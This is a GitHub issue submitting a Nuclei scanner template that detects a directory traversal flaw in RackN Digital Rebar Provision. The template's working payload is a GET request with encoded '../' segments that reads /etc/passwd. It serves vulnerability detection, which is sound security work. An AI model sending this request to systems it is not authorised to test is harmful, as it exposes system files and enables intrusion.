### ISSUE TITLE
RackN Digital Rebar provision - Directory traversal 

### ISSUE THREAD

**Issue by c-sh0** [projectdiscovery/nuclei-templates#3781]
### Template Information:
RackN Digital Rebar provision - Directory traversal 
- This CVE is not in the NVD database https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
- Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others)
- X-Drp-Sha256sum: header is always returned

Tested with multiple vulnerable and fixed versions
https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags
```
docker run -it --rm --net host index.docker.io/digitalrebar/provision:$TAG /bin/bash
```
### Nuclei Template:
```yaml
id: CVE-20200924a

info:
  name: Web requests can navigate outside of DRP controlled areas - Directory traversal
  author: c-sh0
  severity: critical
  description: Web requests can navigate outside of DRP controlled areas - Directory traversal
  reference:
    - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
    - https://docs.rackn.io/en/latest/doc/release.html
    - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others)
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-20200924a
    cwe-id: CWE-22
  tags: cve,cve2020,lfi,rackn,digitalrebar

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'X-Drp-Sha256sum:'

      - type: regex
        regex:
          - "root:.*:0:0"
```
![dr-cve](https://user-images.githubusercontent.com/25989137/155816873-37892be2-02a1-4927-b076-13db4a93504c.png)
